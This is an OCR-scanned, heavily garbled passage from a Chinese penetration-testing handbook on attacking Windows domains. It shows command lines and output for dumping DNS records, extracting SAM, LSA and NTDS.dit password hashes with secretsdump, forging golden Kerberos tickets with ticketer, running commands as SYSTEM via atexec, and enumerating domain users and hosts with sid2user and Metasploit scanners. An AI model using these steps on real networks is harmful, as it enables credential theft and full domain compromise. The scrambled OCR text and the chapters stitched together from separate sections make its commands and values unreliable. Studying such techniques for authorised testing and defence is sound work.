/Desktop/tools/adidnsdump-1.1.0/adidnsdump# python dnsdump.py 
rootkit\\alee 192.168.3.144 
Password: 
1 Connecting to host... 
i Binding to host 

Bind OK 

Querying zone for records 
{+} Found 12 records 





查询 结果 在 当前 目录 records.csv 中 查看 ， 如 下 图 。 


rt :~/Desktop/tools/adidnsdump-1.1.0/adidnsdump# ls 
dnsdump.py . init .py records.csv 
rootckali:~/Desktop/tools/adidnsdump-1.1.0/adidnsdump# cat records.csv 
type,name,ip 

A,Srv-Web-Kit,192.168.3.73 

A,pc-torndo-Kit,192.168.3.77 

A,PC-micle-Kit,192.168.3.76 

A,PC-jerry-Kit,192.168.3.75 

A,0wWa2013,192.168.3.144 

A,0wa2013,192.168.229.186 

A,ForestDnsZones,192.168.229.186 

A,ForestDnsZones,192.168.3.144 

A,DomainDnsZones, 192.168.229.186 

A, DomainDnsZones, 192.168.3.144 

A,@,192.168.229.186 

A,@,192.168.3.144 





查询 dns 详细 内 容 ， 并 打印 查询 过 程 


Python dnsdump.py -r -u domain\user dc-ip 
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pesktop/tools/adidnsdump-1.).6/adidnsdump# python dnsdump.py ~r -U 
.v 192.168 .3.144 


ting to host... 
j to host 


下 


sone for records 
cord Srv-Web-Kit 
ecord pc-torndo-Kit 
record PC-micle-Kit 
record PC-jerry-Kit 
ecord owa2013 
record ForestDnsZones 


DomainDnsZones 
msdcs 
ldap. tcp. FforestDOnsZones 
ldap. tcp.DomainDnsZones 
ldap. tcp.Default-First-Site-Name, sites.ForestDOnsZones 
ldap. tcp.Default-First-Site-Name. sites.DomainDnsZones 
ldap. tep.Default-First-Site-Name. sites 
d ldap. tcp 
record kpasswd. udp 
1 record kpasswd. tcp 
j record kerberos. udp 
0 kerberos. tcp.O0efault-First-Site-Name. sites 
i re kerberos. tcp 
j record gc. tcp.Default-First-Site-Name. sites 
j record gc. tcp 
record @ 
| 12 records 





> socks tE T 347 2:38dns TE ANA 





Proxychains Python dnsdump.py -r -u domain\user -v --dns-tcp dc-ip 
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EGON kA :+/Desktop/tools/adidnsdump-1.1.0 adidnsdump# proxychains python dnsdum 
p.py -r -u rootkit\\alee -v ..dns-tcp 192.168.3.144 
ProxyChains-3.1 (http://proxychains.sf.net) 
Password: 
Connecting to host... 


| | Binding to h 
]S-chain|-«»- 9:8000:«»«».-192.168.3.144:389-«»«»-OK 


{+} Bind OK 
Querying 20ne for records 
Found record Srv-Web-Kit 
Found record pc-torndo-Kit 
Found record PC-micle-Kit 
Found record PC-jerry-Kit 
Found record owa2013 
Found record ForestDnsZones 
Found record DomainDnsZones 
Found record  msdcs 
Found record ldap. tcp.ForestDnsZones 
Found record ldap. tcp.DomainDnsZones 
Found record ldap. tcp.Default-First-Site-Name. sites.ForestD0nsZones 
Found record ldap. tcp.Default-First-Site-Name. sites .DomainDnsZones 
Found record. ldap. tcp.Default-First-Site-Name. sites 
Found record ldap. tcp 
Found record kpasswd. udp 
Found record kpasswd. tcp 
Found record kerberos. udp 
Found record kerberos, tcp.Default-First-Site-Name. sites 
Found record kerberos. tcp 
Found record gc. tcp.Default-First-Site-Name. sites 
Found record gc. tcp 
Found record @ 
Found 12 records 





AWA SharpAdidnsdump 


需要 条 件 : 任意 域 主 机 权限 且 安装 了 .NET 模 块 。 
SharpAdidnsdump( ) 
是 adidnsdump C# 版 本 ,可 直接 在 windows 主 机 上 运行 并 产生 结果 ， 不 需要 域 账号 。 
使 用 命令 SharpAdidnsdumpis.exe dc-address 


首先 需要 查询 DC ip 
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sharpAdidnsdump.exe 
acon to run: SharpAdidnsdump.exe 
ted home, sent; 56 bytes 

tput 


dnsdumpis.exe dc-address 


net group “domain controllers” /domain 


x on to run: net group “domain controllers" /domain 
home, sent; 69 bytes 

j output 

sin Controllers 


有 域 控制 器 


lt ‘ping OWA2613 -n 1 -4 


1 beacon to run: ping OWA2013 -n 1 -4 
lled home, sent: 51 bytes 
i output 


}.rootkit.org [192.168.229.186] 具有 32 字 节 的 数据 : 
29.186 HAN: 字 节 =32 时 间 <1ims= TIE=128 


的 Ping 统计 信息 ; 
ik = 1), BERK =], BR = 8 (0. HK), 
(UEV HAN): 
iS, MK = oms, RH oms 





SharpAdidnsdump.exe 192.168.229.186 


3 执行 查询 操作 
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beacon» shell SharpAdidnsdump.exe 192.168.229.186 

i*J Tasked beacon to run: SharpAdidnsdump.exe 192.168.229.186 

[+] host called home, sent: 66 bytes 

[*] received output: 

Running enumeration against 192.168.229,186 

Running enumeration against LDAP://192.168.229,186/DCzDomainD0nsZones ,DC-rootkit,DCzorg 


Domain: rootkit.org 


Host gc. tcp. rootkit, org 69,172, 261.153 

Host gc. tcp. Default-First-Site-Name. sites. rootkit.org 69.172.201.153 
Host kerberos. tcp. rootkit.org 69.172.201.153 

Host kerberos.. tcp.Default-First-Site-Name. sites. rootkit.org 69.172,201.153 
Host kerberos. udp. rootkit.org 69.172.281.153 

Host kpasswd. tcp, rootkit.org 69.172.201.153 

Host _kpasswd. udp.rootkit.org 69.172.281.153 

Host. ldap. tcp.rootkit.org 69.172.201.153 

Host ldap. tcp.Default-First-Site-Name, sites.rootkit.org 69.172.201.153 
Host msdcs.rootkit.org 69.172.201.153 

Host 0wa2013.rootkit.orq fe80::6c95:efcd:6982:1ae8*.15 

Host owa2013,rootkit.org 192.168.229.186 

Host owa2013,rootKit.org 192,168.3.144 

Host Srv-Web-Kit rootkit.org 192.168.3.73 

Host PC-jerry-Kit.rootkit.org 192,168.3.75 

Host PC-micle-Kit.rootkit.org 192,168.3.76 


[*] received output: 
Host pc-torndo-Kit, rootkit.org 69,172.201.153 


SharpAdidnsdump end 
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iEket 框 架 之 域 信息 获取 

本 时 讲述 impacket 套 件 内 部 分 常用 域 、 内 网 信息 收集 工具 使 用 ， 将 会 用 到 的 工具 ， 
mp. lookupsid、esentutl、ticketero 

rs, 


" Secretsdump 


eetsdump 常 用 于 本 地 、 远 程 hash 导 出 ， 具 体 使 用 方法 如 下 。 
先 通 测 试 工作 中 ， 为 了 辐 名 杀 软 等 防护 产品 ，dump 目 标 机 hash 通 常会 进行 以 下 操作 。 


eg.exe save hklmNsam c:\sam.save 
> reg.exe save hklm\security c:\security.save 
eg.exe save hklm\system c:\system.save 


以 上 上 三 个 注册 表 项 解释 : 
SAM 存 储 域 用 户 或 本 地 用 户 的 数据 ， 包 括 域 用 户 组 名 或 本 机 用 户 组 、 用 户 名 及 密码 哈 希 等 。 
Security 存储 用 户 安全 策略 ， 存 储 域 用 户 、 本 地 用 户 登陆 记录 ， 缓 存 的 登陆 用 户 凭证 ， 例 如 
ain caches 

stem 用 来 解密 SAM 和 Security o 


b 后 使 用 secretsdump 进 行 hash 内 容 导 出 ， 具 体 方 法 如 下 : 
1 本 地 hash 导 出 
获取 SAM 中 hash 






cretsdump. py -sam sam.save -system system.save LOCAL 


Administrator>secretsdunp.exe san san.saue ~systen systen.save LOCAL 
LU Wd Copyright 2002-2018 Core Security Technologies 


t system hootKey: Üx4dbebabc63dbe6f b7£8dc6444364£ 247 
ing local SAM hashes uid:rid:lnhash:nthash) 
‘ator: 5682 aad3h435b$1 484ee aad3b435b51 4B4ee :ccef 288064852696 28db2cad21734 
1? aad3h435b5 1 4B4ee aad3bh435b51484ee : 40469 4f 895 £ 136260608 144493054679: :: 


ning up... 


RBsecurity save 中 缓存 的 登陆 用 户 凭证 和 LSA Secrets 






ecretsdump. py -security security.save -system system.save LOCAL 
K 
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iWsers Mdninistrator>secretsdunp.exe  -security security.save ~ 


Copyright 2882-2018 Core Security Technologies 


[*] Target systen hootKey: üx4dbebabcó63dbe6f b7£8dc6444364£247 

[=] Dumping cached domain logon information (uid:encroptedHashzlongDonain:donain 
> 
(*1 Dumping LSA Secrets 

[xl $MACHINE.ACC 

MACHLNE ACC: aad3h43Sh$1484ee aad3b435b51404ee :d47dd4266c £ 89 3686938243512e9383S5 
[*] Default Password , 

<Unknown User): ROOTHI23 

[*»] DPAPI SYSTEM 

8888 @1 80 88 B8 BC 94 BE 2F 16 99 

0818 CC 27 SA 25 1B 5A 69 54 D8 6F Bi 74 

9928 88 94 2C D6 58 D2 88 A2 B1 ØB 34 2C 


2cdb58d268 a2 bil Bb342c 

[*] LSASP.NETAutoGenKe ysU44. 8.38319 .17929 

9008 21 F9 E 73.40 C6 DE 21 9B 28 53 £ 47 8k 

99018 AY SB 3526555 09:2 BS 3 DB %7! > DS EE 26 

8828 SA 89 3 48 F6 72 3 BB 25 DF 

9938 DF FF 22 ?3 D6 FO 33 BF . 5 23 EE CA 84 

8840 81 C2 $5 34 DƏ 81 : FE C3 E 5 63 fii 

09050 CHLL SF 63 C1 8A 3C 8F X 1F.2F 

9060 Be 43 35 67 A2 SF ?Dw 5 66 A4 

W078 DR 79 6C EA ED @ 48 82 48 

8880 3 AD Pi F4 EB E3 BA 84 : 3C EE 

B98 4 CE f3 EC B. 75 B8 AYANT 5 

BBall E 2 82 EF 9B 9C 75 : F8 OF B4 ue. NM... 
Ob K E 4B Fi Eb 4E 66 903 EE E 69 BIA MONE a CLE 
paco E 2 99 BF f ` 7¢ 22302 KUNST 
0d@ ID 3 t 9D 43 2 9F BB Gla Sr, 9s 
00c ð A GA y D3 F4: E dE, 

aofa 5 82 34 s A f 

0188 Be 16 C? FC 

0110 5€ BB 3 22 F EA 

0120 : £ F3 5 > 5 > Ep si): Si) AEE TEAT wb, Gi 
6134 x Y 学 ESD EE AA PETI. SN T Vs 
8148 BC B5 SC EF 3 CAR Eau kcu JAY ya 
0158 s 5 92 65 E 4 C EORR SEN AA at e: A 5 
8168 dd S. hr MA eine Res T 
9178 3 

0188 < ;1 BE x bE Lanse: 
8198 X 3 À f a2 ja BRAINE 4» 
LET " A 5S8 E : i FON 8... T. aHa. 
Biba 4 914 z : (C UFMMTIRdI 

Bica BB E j E TEBUCLENCE Lu 


获取 sam security 中 所 有 内 容 





secretsdump.py -sam sam.save -security security.save -System system.save 
LOCAL 
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TETTIE EET INE KULAN FUR AV AM DE DY RATE 

ro:Dero didierstevens$ ./secretsduap.py -ntds ntds.dit -system system -outputfile 
As s * EE 

~ Copyright 2082-2816 Core Security Technologies 

bootKey: 0x13420976463ea5e836036ecBbc6BdGeb 

in Credentials (dowain\uidi rid: Urhashznthash) 

r pekList, be patient 

id and decrypted: 422063e51e46cd28022a6a!703c04984075 

decrypting hashes from ntds.dit 

9:111f37ed915c5716aad3b435b51404ee:0b3719c074303274cb923442a734Bef4: :: 

35651404eeaad3b435051404ee:31d6cfetd16ae931b73c59207e0c089c0: :: 

11001:2ad3b4350651404eeaad30435551404ee:422feb7ef 3bBcbea98bfofOf76a50081::: 

b435551404ee2ad3b435b51404ee:054d1a318e2664032604831c919342308::: 

35b51404eraad35435b51404ee: f031611!16bboa6f9deB4dffcció4e0f18::: 


hash 导 出 
导出 还 需要 NTDS.dit 活 动 目录 数据 库 文件 ， 具 体 导 出 方法 请 查看 gitbook《 转 储 域 账 


-ntds NTDS ,dit -system SYSTEM LOCAL -outputfile 





etsdump ,py 


p .exe -ntds NTDS .dit -System temp sys.hiv LOCAL-outputfile lol.hash 
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>Wisers Adninistrator>secretsdunp.exe -ntds NIDS.dit “systen tenp.sys.hiu LOCAL 
-outputfile lol.hash 
Inpacket v@.9.17 ~ Copyright 2002-2018 Core Security Technologies 


Target system bootKey: Ox4dbebabc63dbe6£ b7£84dc6444364£ 247 

Dumping Donain Credentials Cdomain wid:rid:Inhash:nthash? 

Searching for pekList, be patient 

PEK & @ found and decrypted: 4dbc85965acei6i1cAdi1f04c027ccce6981 

Reading and decrypting hashes fron NTDS dit 
rootkit .orgWAdministrator:560: aad3h435b51 4A4eeaad3h435b$1444ee :S18b98ad4i 78aS369 
,dc997aa82d455c ::: ^ 
suest 2581: aad3b43$hb$1484ee aad3b435b51 4B4dee : 3idécheOdibacI3ib73cSId7eBcB8ICE: sz 
OVWA2ZB13$ 21001  aad3 b435 b51 4B4eeaad3hb435b5 1 4b4ee : d47dd4266cf 8936869382a351 2693835: 


ike bt gt :>S82:aad3b435hb$ i 4A4ecaad3b43SbS1 4B4ee 2c 3dSO42c6 Jef Sf 46 1dBhbabecddIead49: 2: 
rootkit org '$131888-2U3U DS R2OEGS 21121 saad3b435b51 404eeaad3h49$hb514B4ee :31d6cfeBd 
16ae931b73c59d7eBc9889c8::: 

rootkit .org\SM_ 252acaa7428O4ecfhat 1122: aad3h435h51 4b4ecaad3h435b51 4l4ee :31d6cf eda 
6ac931b73c59d7c 8c 089c0::: 

rootkit org \SM_63d347f Gha2c4d468 21123 > EROS EE TT Rt AP E LEUTE LUE 
16ae931b73c59d7eB8c889c8: :: 

rootkit -org\SM_d6e64a95£812485 a9 51124: aad3b43ShS 1 4A4deeaads3h435h5i 444ee - 3idbcfe@d 
[16ac931b73c59d 7e 8c 889c8: 2: 

“ootkit ordNM Labd8fco42¢5a47188 21125 saad3h43gSb51 44eeaad3b4ISh51 404ee :31d6cfeBa 
6ae931b73c59d7e8c889c8::: 

rootkit .org\SM_48Scfe3h6e8@341814a:1126 : aad3h43$b$1464ee aad3b43$b51 484ee :31d6cfeBd 

H6acIIi bP3cSId7?eGcBsIcB: z: 

rootkit .org\SM_1b6c81f chaf 64269-1127: aad3h435hb51464eeaad3Ih435b514G4ee -3idbce Fetd 
bacIZi h?3cS9A7eEBcBBIcB: : : 

rootkit .org\SM_ d4ad41SfS6164ecf9 211292 aad3b439Sb$1 404eeaad3b43$b$1 4b4ee 2 2723756603 
c50c4962828ad257c3e8aa::: 

rootkit org SSM _576acO9 3ed8e4df69 211382 aad3b43Sh51 4B4eeaad3h435b51 4Gdee :ed435e08f3 
BdIdd455F VeBhashBSPfee::< 

rootkit .org\SM_e6d4d2b1666b4d9fb21131t aad3b435b$1484ecaad3h43$b$1404ee :dcd4ad195 
adacSI6dbdald8ibadSe8Ba::: 

rootkit orgNituser:1132: aad3h435hb$1444ece aad3b435hb51484ee 7518698 ad4i 78a53695acI97 
aa82d455c::: 








rootkit .org\jack:1135 :aad3b43$b$1464ee aad3b43Sh$1404ee :ccef208c6485269c20db2cad2 
734fe7::: 
-orgNlee - 11362 aad3b435 b5 1 484eeaad3b435h51 4b4ee 2 a7bF1448cacdc4tec ?9a93c584 


-org Nk lion?1137: aad3h435h$1404ee aad3b435 b$1484ee :518b98ad41 78 aS I69SdcI9 7a 
@2d45$e::: 
rootkit .org\he 110:1138: aad3b43$hb514@4eeaad3h435b51 44ee:a?6f1448cacdc4Hec79aP3c5 
B4137F Fd::: 

rootkit .orgNnic le21139 : aad3h435b514G4eeaad3h43Sh$ 1 444ee i ccef248c6485269¢ 28db2c ad 


proxychains python secretsdump.py rootkit/administrator@192.168.3.144 


3. 远 程 导出 hash 

secretsdump 还 支持 远程 导出 hash， 支 持 socks 代 理 传输 数据 ， 需 提供 远程 服务 器 管理 员 账 号 赁 
证 ， 支 持 两 种 方式 读 取 活 动 目录 数据 库 ，Vssadmin 和 DRSUAPI(Directory Replication Service AP!) 
远程 目录 复制 协议 api。 

secretsdump 远 程 导出 hash 参 数 介绍 





ht^ 









et-dc- 
ust-dc 只 导出 包含 NTLM 和 kerberos 数 据 的 NTDS ,DIT 


£-dc-ntlm 只 导出 包含 NTLM 数 据 的 NTDS . DIT 
-Jast-set 导出 的 每 个 账户 显示 密码 最 后 一 次 设置 时 间 
“yser-status 显示 是 否 账户 已 禁用 或 失效 

导出 用 户 历史 密码 hash 





这 本 远程 机 hash 及 级 存 记 录 。 


p 


| 
— secretsdump.exe rootkit/administrator@192.168.3.144 
| 5 


user USERNAME 导出 指定 用 户 NTDS .DIT 文 件 ， 该 功能 使 用 DRSUAPI 接 口 导 出 数据 。 








E 管理 员 : 命令 提示 符 L=”| 品 


tranet \tool\inpacket >Dsecretsdunp.exe rootkit/adninistrator@192.168 .3.144 
et v@.9.17 Copyright 2082-2818 Core Security Technologies 


yet system bootKey: @x4dhebahc6 3dbe6f b7f 8dc644d364£ 247 
ping local SAM hashes Cauid:rid: lnhashinthash)> 
trator: 588: aad3b43$bS1 404eeaad3b435bS1 484ee :ccef 208c6485269c 2B8db20ad21934 


581:aad3b435b51404ceaad31b435b51404ce:404594£895£136e26c0c6481444936054679 ::: 
ping cached domain logon information (uid:encryptedHash: longDomain:donain 


unping LSA Secrets 
OWA2813$ taad3b435hb5 1 4O4ee aad3b435b5 1 484ee 2 d47dd4266c £8936869382a351 26938 


‘fault Passvord 


own User>:ROOTHI23 

PAPI SYSTEM 
41 08 88 88 BC 94 BE 2F 16 09 PA 18 DS 3F 34 EB 
CC 27 58 25 1B SA 69 54 D8 GF Bi 74 8F 73 @8 59 
68 94 2C D6 58 D2 88 AZ Bi OB 34 2C 


208 .a2b1Bh342c 
ISP. NETAutoGenKe ysU44.8. 30319 .17929 
21 F9 E? Di 73 48 C6 DE 21 9B 2 
Ag 《 4B 13 36 55 C9 20 BS 53 
SA 69 C3 48 F6 D2 E3 PS 
DF FF 22 73 D6 F8 33 BF 54 Bi 2: 
81 C2 17 15 34 De 60 7E EE 4 sus 
2D 6F 63 C1 3C 6C EQ SF : x F- 2F SOC. IC CUT 
99 3S 6? R2 ?R C1 SP 7 AF Ot 并 cant eS 
79 6C ER ED 89 SD D? £ 2 i..yl...J.H-ER.H 





使 用 Vssadmin 复 制 用户 数 据 库 文件 的 方式 进行 远程 hash 导 出 





Secret sdump , exe rootkit/administrator@192.168.3.144 -just-dc -use-vss 
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intranet \tool\inpacket Dsecretsdunmp_exe rootkitZadninistrator?192.168.3.144 -j 
ist-do ruse“ yss 


Inpacket v8.9.17 ~ Copyright 2002-2818 Core Security Technologies 


I*] Target systen bootKey: O0x4dhébabc63dbe6f b7f 8dc644d364£ 247 

t*] Searching for NIDS.dit 

f») Registry says NIDS.dit is at C:\Windows NIDSNntds.dit. Calling vssadnin to g 

t a copy. This night take sone tine | 
fw Using snbexec method for remote execution 

[nl Dumping Domain Credentials “domain wüid:rid:lInhash:nthash? 

tx Searching for pekList, be patient 





—. Esentutl 


esentutl 常 用 于 从 dit 文 件 提取 域内 信息 的 工具 ， 有 具体 使 用 命令 
esentutl.exe NTDS.dit export -table datatable >log.txt 
Log xchat 


4115131192 t 
ep eU ; 132028030831 
1A793073 3 
e 
u'hr' 
*11600000000000004088695528b17 f5a80dd8c4bed668814fda2165109fa63 
'1100000000000000€3909613274924f£9c:58a3f29232f460282026b747e037154ed? 
'11000000000000006bc5676€375ee525efbd43b69cc7deef93148c £020189b9ecc8c4| 


ATT3231073 
ATT9589983 
ATTm131282 


A1123131091 : 

ATT1131074 ; EaI, 

ATTp131353 ` "1301000000000000 ' 

ATTKSB9826 |o1af6747487812€£74289395e9edc2a1de5* 

ATTb590606 > 1481 

ATTm- 1846239338 u'/os0day Mail/ousExchange Administrative Group (FYDIBOHF23SPDLT)/cn 
ATTm-1973266359 Ld hen 

LIS 1878499964 t 79c109dd5b62273458018d9451d19643b: 





=. Ticketer 


由 于 某 些 情况 下 ， 渗 透 测 试 的 进行 需要 在 linux 平 台 下 展开 ， 但 是 mimiktza 生 成 的 黄金 、 白 银 标 
EE e eee act ok) 
ticketer 用 于 在 linux 平 台 生 成 票据 传递 测试 所 需 数据 (ccache)。 并 且 ticketer 支 持 socks 代 理 传递 数 
据 。 
使 用 参数 如 下 : 
生成 黄金 票据 


python ticketer.py -nthash ntlmhash -domain-sid sid str -domain domain.com ranc 
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f ntim hash 为 域 krbtgt 账 号 ntlm hash，sid 为 目标 域 sid( 获 取 方 式 查 看 第 四 章 )， 
为 目标 域 域名 (或 任意 填写 )，random_username( 任 意 填写 ) » Eo 


icketer.py -nthash c3d5042c67ef5f461d0ba6ecdd9ea449 -domain-sid S-1-5-2 


> 


E. localhost 
kali 


owing lines are desirable for IPv6 capable hosts 
calhost ip6-localhost ip6-loopback 

ip6-allnodes 

ip6-allrouters |... 

3.144 rootkit Hip 

3.73 Srv-Web-Kit 目标 机 ip 对 应 


ip oxychains 配 置 文 件 需 注释 proxy_dns 选 项 。 导入 金 票 路 径 至 环境 变量 KRB5CCNAME: 
RY: 
t KRBSCCNAME=/path/test .ccache 


可 以 使 用 impacket 套 件 内 任意 含有 -k 参 数 的 工具 对 目标 机 (此 处 为 Srv-Web-Ki 进 行 信息 获 
执行 等 操作 。 
jatexec 执 行 命令 示例 : 注意 执行 命令 使 用 的 用 户 名 应 与 ticketer 生 成 票据 时 使 用 的 用 户 名 相 
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à :-/Desktop/tools/impacket/examples/ key# python atexec.py -k -no-pass -d 
Pbug testGSrv-web-Kit whoami 


This will work ONLY on Windows >= Vista 
Using Kerberos Cache: /root/Desktop/tools/impacket/examples/key/test.ccache 
Domain retrieved from CCache: ROOTKIT 
SPN CIFS/SRV-WEB-KIT@ROOTKIT not found in cache 
AnySPN is True, looking for another suitable SPN 
Returning cached credential for KRBTGT/ROOTKIT@GROOTKIT 
Using TGT from cache 
Trying to connect to KDC at ROOTKIT 
Domain retrieved from CCache: ROOTKIT 
Using Kerberos Cache: /root/Desktop/tools/impacket/examples/key/test .ccache 
SPN HOST/SRV-WEB-KITGROOTKIT not found in cache 
AnySPN is True, Looking for another suitable SPN 
Returning cached credential for KRBTGT/ROOTKITGROOTKIT 
Using TGT. from cache 
Trying to connect to KDC at ROOTKIT 
Creating task \CHaiJQVC 
Running task XCHa1JQVC 
Calling SchRpcGetLastRunInfo for XCHaiJQVC 
Deleting task \CHaiJQVC 
Attempting to read ADMIN$\Temp\CHaiJQVC. tmp 
t authority\system 


f+} Deleting file ADMIN$\Temp\CHaiJOVC.tmp 


通过 socks 代 理 ， 对 目标 进行 金 单 测试 。 


Ot KRRTGT/ROOTX T TAPOOTKI 
yitest ccache 


+ 
Pep Trying ta connect to KOC at ROOTKIT 
120, 7B, FS 726:1982-«»«»-192 168.3. 144: BB «^» OK 
task \RiPserra 
k ARTP sara 
WecoetlastRuninfo for \aiPsarra 
task xRIPiEtCTA 
ing fo resd ADMINSSTempNXRIPserrA tmp 


file ADMINS \ Temp \RiPsarra tap 


Vd. lookupsid.py 


可 查看 远程 目标 机 器 或 域 控 所 有 用 户 内 容 ( 需 提 供 域 任意 用 户 凭证 ) 
lookupsid 在 读 取 远 程 机 器 用 户 信息 时 ， 同 时 会 输出 域 SID ， 域 SID 是 生成 黄金 票据 所 需 数 据 。 


lookupsid.py domain/user:passwordQip 





iepatket exasptesd proxychains python RORIS PY roctkit/eicle:Adn1n123450192.168.3. 144 
xychains, siret) = pede L et 
yright 2019 SecureAUth Urporation 


168 3. 144 
168.3 144 [ApipeMtsarpc] 
82:«»5»:192.108.3 
5-23.3759881 1 
Read: only Boeain controllers idtypesroup) 
isidtypeuser) 
oeUser) 
eUser) 
Type 
(Sidlypesro 


Typecro: 
EDITIO 
(sa dT ypeGrovp) 
ypealias) 
eGroup? 
TypeGroop! 
ene es idlypróroup? 
tstdTypeóoro 
dIypeórnup! 
Las} 
j Replication Group (S1dTypeAtias) 
Password Replication Gr TypeAlsas) 


Management dTypeGroup? 
agement (S1dTypeGroup) 
agener (SidTypeo 


Sidtypeare 


Ynagement iSydighiedr on 

nagement (81dTypeGr 
id¥ypeGro 
ty 
Management (SidTypeGroup) 
e Servers (SidTypeGroup) 

Trusted Subsystem (Sidlypecroup} 

lability Servers isidtypeGroup) 


iD 也 可 以 使 用 whoami /user 命 令 ， 如 下 图 。 


ers \nicle.ROOTKIT>whoami /user 





reso 


tNnicle 8- 1-5-21-37598819254- 2993291187- =35 77547808 


TI 


ers \mic le .ROOTKIT> 
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域 信 息 收 集 之 user2sid，sid2user 


使 用 场景 : 当前 内 网 环境 有 域 环境 ， 使 用 nbtscan 或 者 nltest 获 取 到 域 控 的 IP， 但 是 没有 域 用 户 的 崩 
号 密码 。 


(FFA: 使 用 sid2user 和 user2sid 枚 举 猜测 出 域 用 户 名 ， 并 通过 弱 口 令 获取 域 用 户 的 权限 下 载 
地 址 : 


使 用 


user2sid.exe \\ 域 控 TP RAPE 
域 里 面 域 管 默认 为 administrator 用 户 ， 且 sid 为 500 
那么 先 通 过 administrator 域 管 获取 域 用 户 的 sid 
user2sid.exe \\192.168.52.2 administrator 


得 到 域 用 户 的 sid 为 S-1-5-21-675002476-827761145-2127888524-500 


C:Wsers Administrator \Desktop>user2sid.exe \\192.168.52.2 administrator 


8-1-5-21-6758002476—827761145—2127888524-5808 


Number of subauthorities is 5 
Domain is HACK 

Length of SID in memory is 28 bytes 
Type of SID is SidTypeUser 





然后 取 5-21-675002476-827761145-2127888524 值 ， 并 且 把 -替换 为 空 
再 使 用 sid2user 枚 举 域 用 户 
sid2user.exe \\192.168.52.2 5 21 675002476 827761145 2127888524 500 


C: Users Vidninistrator*NDesktop?sid2user.exe \\192.168.52.2 5 21 675002476 827761145 2127888524 588 


Name is Administrator 


Domain is HACK 
Type of SID is SidTypeUser 





遍历 jd， 比如 数字 500 以 上 ， 成 功 枚 举 出 域 用 户 guest，iis_user 等 域 用 户 
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5w192.168.52.2 5 21 675082476 827761145 2127888524 SOL 


5WÍ92.168.52.2 5 21 675082476 827761145 2127888524 582 


adninistratorNDesktop?sid2user.exe ^M92.168.52.2 5 21 675802476 827761145 2127888524 503 


efaultfecount 

HACK 

ID is SidTypeUser 

Administrator Desktop>sid2user.exe \\192.168.52.2 5 21 675002476 827761145 2127888524 504 


iName failed 一 no such account 


fdninistratorNDesktop?sid2user.exe \\192.168.52.2 5 21 675002476 827761145 2127888524 1612 


SID is SidTypeUser 





Bea, Wituser2sid#lsid2user, RTM HIT PRS RAP 
PPR SOS SRA. 


1169 





工作 组 环境 信息 搜集 





1170 



















MSF 发 现 内 网 存活 主机 第 一 季 


Wet: 192.168.1.5 Debian 
EM: 192.168.1.2 Windows 7 
1... 192.168.1.119 Windows 2003 


E 的 search 支 持 type 搜 索 : 


» search scanner type:auxiliary 


uxiliary/admin/appletv/appletv display image 
F auxiliary/admin/appletv/appletv_ display_video 
Maia liary/admin/smb/check_ dir_file 


AS. 


T auxiliary/admin/teradata/teradata odbc sql 

T auxiliary/bnat/bnat. scan 
fauxiliary/gather/citrix published applications 
E. auxiliary/gather/enum dns 


E auxiliary/scanner/winrm/winrm cmd 
"auxiliary/scanner/winrm/winrm login 

- auxiliary/scanner/winrm/winrm wql 
auxiliary/scanner/wproxy/att open proxy 
auxiliary/scanner/wsdd/wsdd query 

T auxiliary/scanner/x11/open_x11 


r type: auxiliary 





| BENE neridiscoverylarp_sweep 
d Büxiliary/scanner/discovery/udp. Sweep 
t Bliliary/scanner/fto/ftp ， version 

t Buxiliary/scanner/htto/http. | version 
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TTA 绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 


Disc 


201€ 


2017 


Pose p hon 


normal 
normal Yes 2 e/Directory | 
Module 


e auxiliary/scanner/smb/smb version 


一 : 基于 scanner/http/http_version 发 现 HTTP 服 务 


msf auxiliary(scanner/http/http version) > show options 


Module options (auxiliary/scanner/http/http version): 


Name 
Proxies 
RHOSTS 
RPORT 
SSL 
THREADS 
VHOST 


msf auxiliary(scanner/http/http version) » exploit 


Scanned 
Scanned 
Scanned 
Scanned 


Scanned 
Scanned 
Scanned 
Scanned 
Scanned 


] 
] 
] 
] 
] 
] 
*] Scanned 
] 
] 
] 
] 
] 
] 


192.168. 


Current Setting Required Description 


192.168.1.0/24 


80 


false 


20 


192: 168 161 


27 
63 
82 
103 


1.119:80 Microsoft-IIS/6.0 ( Powered by ASP.NET ) 


129 
154 
182 
205 
231 
256 


80 


of 256 hosts 
of 256 hosts 
of 256 hosts 
of 256 hosts 


of 
of 
of 
of 
of 
of 


256 
256 
256 
256 
256 
256 


hosts 
hosts 
hosts 
hosts 
hosts 
hosts 


Auxiliary module execution completed 


Ld Ls 





no A proxy chain of format type:host:port[. 


yes The target address range or CIDR identi 
yes The target port (TCP) 

no Negotiate SSL/TLS for outgoing connecti 
yes The number of concurrent threads 

no HTTP server virtual host 


(10% complete) 
(24% complete) 
(32% complete) 
(40% complete) 


(50% complete) 
(6096 complete) 
(71% complete) 
(80% complete) 
(90% complete) 
(100% complete) 
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annershttp-http version) > show options 
(auxiliary/scanner/http/http version): 


urrent Setting Required Description 
A proxy chain of format type:host:port(.type:host:port]{... 
.168.1.0/24 y The target address range or CIOR identifier 
yes The target port {TCP} 
Negotiate SSL/TLS for outgoing connections 
The number of concurrent threads 
HTTP. server virtual host 


version) > exploit 


conplete) 
complete) 


wered by ASP.NET } 

complete) 

complete} 

complete) 

complete) 

omplete} 

complete) 
mpleted 





=: 基于 scannerl/smblsmb version 发 现 SMB 服 务 
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msf auxiliary(scanner/smb/smb version) » show options 


Module options (auxiliary/scanner/smb/smb version): 


Name Current Setting Required Description 

RHOSTS 192.168.1.0/24 yes The target address range or CIDR identi 
SMBDomain . no The windows domain to use for authentie 
SMBPass no The password for the specified Username 
SMBUser no The username to authenticate as 
THREADS 20 yes The number of concurrent threads 


msf auxiliary(scanner/smb/smb_version) > exploit 


2% 


192.168.1.2:445 - Host is running Windows 7 Ultimate SP1 (build: 7601) 
Scanned 40 of 256 hosts (15% complete) 

Scanned 60 of 256 hosts (23% complete) 

Scanned 79 of 256 hosts (30% complete) 

192.168.1.119:445 - Host is running Windows 2003 R2 SP2 (build:3790) (né 
Scanned 103 of 256 hosts (40% complete) 

Scanned 128 of 256 hosts (50% complete) 

Scanned 154 of 256 hosts (60% complete) 

Scanned 181 of 256 hosts (70% complete) 

Scanned 206 of 256 hosts (80% complete) 

Scanned 231 of 256 hosts (90% complete) 

Scanned 256 of 256 hosts (100% complete) 

Auxiliary module execution completed 


* * 


* 


+ 


Pr c0 mm mmm m i 
* 
Weed eed eed humi deed keel bae eal Bed bcm exl ee 


* 


+ 站 * * * 


* 


msf auxiliary (scanner ‘smb/srb version} > show options 


version); 


